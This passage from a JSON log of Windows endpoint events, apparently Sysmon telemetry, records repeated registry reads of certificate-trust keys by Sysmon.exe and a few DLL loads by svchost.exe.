"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcd.dll", - "image_path": "C:\\Windows\\System32\\bcd.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", - "registry_value": "Start", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 